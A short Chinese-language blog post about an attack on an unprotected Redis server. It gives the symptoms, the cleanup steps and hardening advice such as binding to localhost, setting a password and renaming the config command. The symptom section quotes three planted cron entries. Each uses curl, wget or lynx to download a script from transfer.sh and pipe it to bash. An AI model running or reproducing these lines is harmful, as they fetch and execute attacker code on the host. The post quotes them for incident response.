redis漏洞防攻击

redis服务器遭攻击，症状：
1. redis中的缓存数据每10分钟全部被清；
2. 许多目录下多了root文件和一堆隐藏文件； 
3. redis多了三个Key：Backup1、Backup2、Backup3；

key值对应的内容如下：
Backup1: */2 * * * * curl -shttps://transfer.sh/GoZkF/tmp.DoRh9YAdFi > .cmd && bash .cmd
Backup2: */5 * * * * wget -O .cmd https://transfer.sh/GoZkF/tmp.DoRh9YAdFi&& bash .cmd
Backup3: */10 * * * * lynx -sourcehttps://transfer.sh/15TRyl/tmp.pCnR6is0Gm > .cmd && bash .cmd

应对措施：
1. 在非root用户下重新安装redis，对特定IP开放端口，如果只是本机使用，绑定127.0.0.1:6379 ，增加密码；
2. 清除定时任务；
3. 杀掉进程、删除木马文件；

预防措施：

1. 禁止Redis服务对公网开放，可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ，去掉前面的"#"即可（Redis本来就是作为内存数据库，只要监听在本机即可）；

2. 设置密码访问认证，可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码 （需要重启Redis服务才能生效）；
3. 对访问源IP进行访问控制，可在防火墙限定指定源ip才可以连接Redis服务器；

4. 修改Redis默认端口，将默认的6379端口修改为其他端口；

5. 禁用config指令避免恶意操作，在Redis配置文件redis.conf中配置rename-command项"RENAME_CONFIG"，这样即使存在未授权访问，也能够给攻击者使用config 指令加大难度；

6. Redis使用普通用户权限，禁止使用 root 权限启动Redis 服务，这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限，无法获取root权限；

参考文档:
1. http://bbs.qcloud.com/thread-30706-1-1.html